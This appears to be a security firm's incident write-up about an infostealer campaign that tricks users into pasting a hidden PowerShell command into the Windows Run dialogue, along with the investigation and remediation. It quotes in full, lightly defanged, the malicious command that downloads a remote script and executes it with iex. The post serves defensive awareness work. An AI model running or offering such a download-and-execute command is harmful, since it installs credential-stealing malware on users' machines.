Be cautious of unexpected online instructions, especially involving manual commands.
Solis MDR recently investigated and remediated an infostealer threat that utilises an emerging social engineering technique to trick users into running malicious commands.
The initial detection in this case came from SentinelOne, our endpoint detection and response (EDR) tool. It showed a malicious PowerShell command that fetched a text file from a remote location and executed it. In turn, the second script downloaded and ran an executable called MyDockFinder.exe, and attempted to write persistence to the Run registry key.
> "C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -command $url = 'https[:]//finalstepgo[.]com/uploads/pnk3.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
MyDockFinder.exe was identified as a likely infostealer – a type of malware designed to identify and extract passwords, cookies, browsing histories, and even keystrokes from infected hosts. Once a threat actor has this information, they can attempt to compromise the user’s accounts.
Solis MDR was able to contain and remediate this threat by terminating the associated processes, removing the malicious files, and deleting the Run registry key entry it created. We also recommended that the customer blocked the malicious domain and associated IP address at their network’s perimeter so that the command would fail if any other user executed it.
Identifying the root cause
The mystery underlying this incident was that the malicious PowerShell process was a child of Explorer, which would usually suggest that a user ran a process interactively. However, there was no indication of a suspicious login from a threat actor.
The PowerShell process had command line arguments, so the user couldn’t have simply opened a prompt and typed the command. Our first theory was that it launched via a malicious shortcut, but we couldn’t identify any evidence of a LNK file being written to disk.
When the host came back online and Solis MDR’s analysts were able to review key artefacts, we confirmed that the user in fact ran the command interactively via the Windows Run dialogue. The RunMRU registry key stores commands users have recently executed via this feature:
But why would a user manually run a malicious command – especially one that is too long and bespoke to manually type? The answer lies in the world of social engineering.
Lumma infostealer campaign
Most people are familiar with common forms of social engineering, whereby users are tricked into replying to phishing emails, entering their credentials on fake sites, or downloading malware – but the recent Lumma infostealer campaign uses a less familiar technique.
Typically, a user is presented with a webpage posing as an authentication check. In the background, a malicious command is copied to the clipboard using JavaScript. The user is instructed to press Ctrl+R (opening the Run dialogue), then Ctrl+V (pasting the command), and Enter (executing the command) – tricking the user into running the command themselves.
This explains the activity we saw in this case, and why it stemmed from an interactively launched process. While Solis MDR was able to remediate the technical artefacts on the endpoint, we also advised the customer to ensure their users are aware of this increasingly common technique, and the dangers of trusting instructions they are presented with online.
Solis MDR for Endpoint provides 24/7 monitoring, investigation, and remediation of cyber security threats to your organisation’s workstations, laptops, and servers. Contact our team today at enquiries.uk@solissecurity.com to discuss how we can protect your business.